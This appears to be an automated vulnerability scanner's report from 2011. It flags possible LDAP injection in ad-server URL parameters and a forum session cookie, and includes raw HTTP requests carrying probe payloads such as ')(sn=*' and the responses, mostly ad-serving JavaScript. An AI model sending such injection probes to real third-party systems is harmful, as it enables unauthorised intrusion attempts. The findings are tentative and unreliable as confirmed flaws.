<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... <!-- Code auto-generated on Tue Dec 21 15:59:08 EST 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/3003537/TR_Laser_TradeFreeFor60DaysGet500_300x250_100110.swf"; var gif = "http://s0.2mdn.net/3003537/ TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif"; var minV = 10; var FWH = ' width="300" height="250" '; var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/250%3B39943464/39961251/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var winH = 0; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array();
var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/250%3B39943464/39961251/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500"); var ctp=new Array(); var ctv=new Array(); ctp[0] = "clickTag"; ctv[0] = "";
GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8d3e8d3d71eda696)!(sn=*&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:49:43 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5679
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... <!-- Code auto-generated on Wed Jan 26 14:26:13 EST 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/3003537/TR_MobilePro_GetA500AppleGiftCard_300x250_072010.swf"; var gif = "http://s0.2mdn.net/3003537/1- TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var winH = 0; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array();
var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&SC=S056001&ch_id=D&s_id=MSN&c_id=GFTCRD&o_id=GFTCRD"); var ctp=new Array(); var ctv=new Array(); ctp[0] = "clickTag"; ctv[0] = "";
The UIT parameter appears to be vulnerable to LDAP injection attacks.
The payloads e20e5e04cd95acd2)(sn=* and e20e5e04cd95acd2)!(sn=* were each submitted in the UIT parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=e20e5e04cd95acd2)(sn=*&TargetID=8395935&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:49:23 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5832
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... <!-- Code auto-generated on Tue Dec 21 15:59:08 EST 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/3003537/TR_Laser_TradeFreeFor60DaysGet500_300x250_100110.swf"; var gif = "http://s0.2mdn.net/3003537/ TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif"; var minV = 10; var FWH = ' width="300" height="250" '; var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/250%3B39943464/39961251/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var winH = 0; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array();
var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/250%3B39943464/39961251/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500"); var ctp=new Array(); var ctv=new Array(); ctp[0] = "clickTag"; ctv[0] = "";
GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=e20e5e04cd95acd2)!(sn=*&TargetID=8395935&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:49:24 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5679
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... <!-- Code auto-generated on Wed Jan 26 14:26:13 EST 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/3003537/TR_MobilePro_GetA500AppleGiftCard_300x250_072010.swf"; var gif = "http://s0.2mdn.net/3003537/1- TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var winH = 0; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array();
var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&SC=S056001&ch_id=D&s_id=MSN&c_id=GFTCRD&o_id=GFTCRD"); var ctp=new Array(); var ctv=new Array(); ctp[0] = "clickTag"; ctv[0] = "";
The &PID parameter appears to be vulnerable to LDAP injection attacks.
The payloads 9a64f1d27d5c07b6)(sn=* and 9a64f1d27d5c07b6)!(sn=* were each submitted in the &PID parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=9a64f1d27d5c07b6)(sn=*&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:49:28 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6615
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... <!-- Code auto-generated on Thu Sep 23 15:54:29 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_Options-Charting_300x250.swf"; var gif = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif"; var minV = 10; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=9a64f1d27d5c07b6)(sn=*&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/cc/%2a/u%3B234282361%3B0-0%3B0%3B58044029%3B4307-300/250%3B38529125/38546882/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var winH = 0; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array();
var defaultCtVal = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=9a64f1d27d5c07b6)(sn=*&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/cc/%2a/u%3B234282361%3B0-0%3B0%3B58044029%3B4307-300/250%3B38529125/38546882/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU"); var ctp=new Array(); var ctv=new Array(); ctp[0] = "clickTag"; ctv[0] = "http://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU"; ctp[1] = "clickTag1"; ctv[1] = "http://www.theocc.com/about/publications/character-risks.jsp";
var fv='"moviePath='+ ...[SNIP]...
Request 2
GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=9a64f1d27d5c07b6)!(sn=*&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:49:29 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6450
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... <!-- Code auto-generated on Thu Sep 23 15:41:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_ETFHQ-Pricing_300x250.swf"; var gif = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=9a64f1d27d5c07b6)!(sn=*&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/cd/%2a/f%3B234282360%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529150/38546907/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var winH = 0; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array();
var defaultCtVal = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=9a64f1d27d5c07b6)!(sn=*&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/cd/%2a/f%3B234282360%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529150/38546907/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU"); var ctp=new Array(); var ctv=new Array(); ctp[0] = "clickTag"; ctv[0] = "http://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU";
var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/'; for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}} for(var ctIndex = 0; ctInde ...[SNIP]...
The AN parameter appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the AN parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /adj/N4478.redactedOX2487/B5084478.4;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003G/81000000000034516.1?!&&PID=8240106&UIT=G&TargetID=37665412&AN=*)(sn=*&PG=NBCSAT&ASID=04cbc315ee164e08b173b0c21e708489&destination=;ord=806044538? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 30 Jan 2011 01:40:31 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4617
document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\n');
function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/1782317/SEA8889_30series_newegg_1_21_300x250.swf"; var gif = "http://s0.2mdn.net/1782317/SEA8889_30series_newegg_1_21_300x250.jpg"; var minV = 8; var FWH = ' width="300" height="250" '; var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/s%3B233397388%3B0-0%3B0%3B57368132%3B4307-300/250%3B40404797/40422584/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://www.newegg.com/Product/Product.aspx?Item=N82E16824001423&Tpk=B2230HD"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 600; var winH = 400; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array(); sm[1] = ""; sm[2] = ""; sm[3] = ""; sm[4] = ""; sm[5] = "";
var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/'; for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}} for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/s%3B233397388%3B0-0%3B0%3B57368132%3B4307-300/250%3B40404797/40422584/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3f"+ct[i]);}else{x=escape(ct[i]);}fv+="&clickTag"+i+"="+x+"&clickTAG"+i+"="+x+"&clicktag"+i+"="+x;}} fv+='"'; var bgo=(bg=="same as SWF")?"":'<param name="bgcolor" value="#'+bg+'">'; var bge=(bg=="same as SWF")?"":' bgcolor="#'+bg+'"'; function FSWin(){if((openWindow=="false ...[SNIP]...
Request 2
GET /adj/N4478.redactedOX2487/B5084478.4;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003G/81000000000034516.1?!&&PID=8240106&UIT=G&TargetID=37665412&AN=*)!(sn=*&PG=NBCSAT&ASID=04cbc315ee164e08b173b0c21e708489&destination=;ord=806044538? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 30 Jan 2011 01:40:32 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5626
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 24 16:18:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');
function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/1782317/SEA8889_30series_tiger_1_21_300x250.swf"; var gif = "http://s0.2mdn.net/1782317/SEA8889_31series_newegg_1_21_300x250.jpg"; var minV = 8; var FWH = ' width="300" height="250" '; var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/d%3B233397388%3B2-0%3B0%3B57368132%3B4307-300/250%3B40404840/40422627/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var winH = 0; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array();
The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 318 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 30 Jan 2011 02:05:46 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/*)(sn=*/sync-min.html/ was not found on this ...[SNIP]... </p> <hr> <address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address> </body></html>
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 228 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Sun, 30 Jan 2011 02:05:46 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/*)!(sn=*/sync-min.html/ was not found on this ...[SNIP]... </p> </body></html>
The creative parameter appears to be vulnerable to LDAP injection attacks.
The payloads 9942f194f5ec0141)(sn=* and 9942f194f5ec0141)!(sn=* were each submitted in the creative parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /cgi-bin/clickthrough.cgi?db=context&position=7001&tid=bhnibpnmbjnlbgnjbnnpzn&eid=1&id=92509073&creative=9942f194f5ec0141)(sn=*&query=site%20specific%3Amsnbc.com%3Aimage%20image&clickid=92896433&tz=US&UNQ=00000129635037996412713000000106050054&value=UO22E35J253LM&origvalue=GZODAL6QJGBNK&cgroup=adbreak4_blogs HTTP/1.1 Host: click.pulse360.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 02:06:49 GMT Server: Denaro/1.1 Connection: close Location: http://c2.edapebaf.com/cgi-bin/unbilled_click.cgi?id=92509073&source=92896433&db=context&query=site%20specific%3Amsnbc.com%3Aimage%20image&creative=9942f194f5ec0141)(sn&subid= Content-Type: text/html
Request 2
GET /cgi-bin/clickthrough.cgi?db=context&position=7001&tid=bhnibpnmbjnlbgnjbnnpzn&eid=1&id=92509073&creative=9942f194f5ec0141)!(sn=*&query=site%20specific%3Amsnbc.com%3Aimage%20image&clickid=92896433&tz=US&UNQ=00000129635037996412713000000106050054&value=UO22E35J253LM&origvalue=GZODAL6QJGBNK&cgroup=adbreak4_blogs HTTP/1.1 Host: click.pulse360.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 02:06:50 GMT Server: Denaro/1.1 Connection: close Location: http://c2.edapebaf.com/cgi-bin/unbilled_click.cgi?id=92509073&source=92896433&db=context&query=site%20specific%3Amsnbc.com%3Aimage%20image&creative=9942f194f5ec0141)!(sn&subid= Content-Type: text/html
The ASP.NET_SessionId cookie appears to be vulnerable to LDAP injection attacks.
The payloads c9aa3c72e7b4fb27)(sn=* and c9aa3c72e7b4fb27)!(sn=* were each submitted in the ASP.NET_SessionId cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /forums/53.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=c9aa3c72e7b4fb27)(sn=*;
Response 1
